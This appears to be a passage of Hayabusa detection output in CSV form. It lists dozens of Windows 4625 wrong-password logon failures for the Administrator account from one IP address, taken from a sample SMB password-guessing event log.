+2016-09-20 01:51:49.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QewW1ISqRdXwtSXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SFhBcgZfc9VZ5S8S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a4ZSRW7F65yDNbJd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HrbzGNYIbjErVtDR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eFcGaL3asLVIF08d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dhJvIM5PzA9U6GTD | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYrfD15TPp8OuST4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8d4CbZSTHhl7fRfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IItrtl1h3PsKviaQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVeoptuwLNKlm0V2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rf6Ri9Lm81mScRt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: NPVkTRUILL5czcbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZJq3kjykwzh0hVh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHL4KuirjQ96Dgfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DSPjDklMHdW6LqK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EL0oMweyFgI0MEdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NJS2dZhWmCGF1Qos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bNR5dXXnx0LeyNmW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ApUMxqDiqDNo6hrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o3d1caGukhhBHp6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oxDVCaWpkSECRoml | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: coqijUGaaVJXY4GV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ATPa6qMbfQ9QDrW | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mnQEE00r01jhCNzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ir9sY7kG6vbOad4z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: REuk1RZ5eRs3pSbT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 91gfIcAUvKrSAENh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtrVV1ux0v5w5XWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: rFpyAqPQP77Ls6ir | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvwp4DimL7SgBmb0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1lnJZDjghQNQxfG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pBN1g8NBIj6WMrhz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cJMUobtFTwOQTgqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGZeGqe9rC172BVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zNP99dMvvDQl8WVw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qcwp0odjR0LfM11y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6VjaFCzZr8iUUovn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C3YniJHC0Cswfti0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 63lZpExTzSzNR96C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fKI61MTXJ5x9WF56 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhWYNEPWgh03cQSJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvZg2LTYtsUhvBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BENGUFtNxdPjaS03 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fY1s0OG9JR38H6rm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LblLG1Il6ngkuAOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: PAZ83Onp00vURKSz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxvywmA4UMI04zm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1vH6DSer71gxEDRc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDNQibannB453BKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 02qkYtCIrOj38agd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: atDwGfxC4RLYYDAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fCTUmKwLxkKCoCTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DBE7Y8yJMNSkJlaK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N7VGVfH05BC7bgaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lP7kC2ayRIEeL5sw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cQOn41cB2t0ZkSP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PpOyXZwlcCw63tWP | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7R8yD7A0lCU16Z0t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frasd7f8On0O7B6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtOqqV6rkCIZPPFG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lnwn4dc1lKABRKxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiUnLFzfXR6rER9B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: u1InESrL0ebaRw2z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlLAG8gXt9YNeW4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZIWubLvZcDOWHxr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZazp7ZnBrtswAse | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jqK5Vqf0QF4qtg0A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3JvFwi9gDNbO6Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBubAOTZMsahNG0Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KCxrXG3N1IRzDxxM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2h9M7o0lS7oC00a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pprfGGVZblL64xC3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wxgzMKd7eDwzs8WO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q2RljqAhn0NZhR6O | IP Addr: 192.168.198.149 | AuthPackage: 
